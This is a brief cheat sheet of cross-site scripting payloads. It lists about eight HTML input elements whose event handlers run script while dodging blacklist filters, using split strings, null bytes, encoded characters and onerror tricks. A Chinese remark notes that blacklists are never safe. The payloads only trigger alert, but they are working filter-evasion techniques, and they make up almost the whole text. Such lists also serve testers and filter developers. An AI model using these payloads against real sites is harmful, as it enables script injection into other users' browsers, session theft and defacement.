Some XSS Tips
<input onclick="window.onerror=alert;throw 1">
<input onclick="location="javascript:aler'+'t%2'+'81%2'+'9'">
<input onclick="top.onerror=top['ale'+'rt'];throw 1">
<input onclick="outerHTML=URL">
"onblur=javascript:window.onblur=al%00ert;throw 1
()&xss="onclick=a=location.search;location.href="javascript:a"+"lert"+a[1]+a[2]//
<input onclick="location=self.name">
<input onclick="document.domain=''">
黑名单终归是不安全的。
Tips from: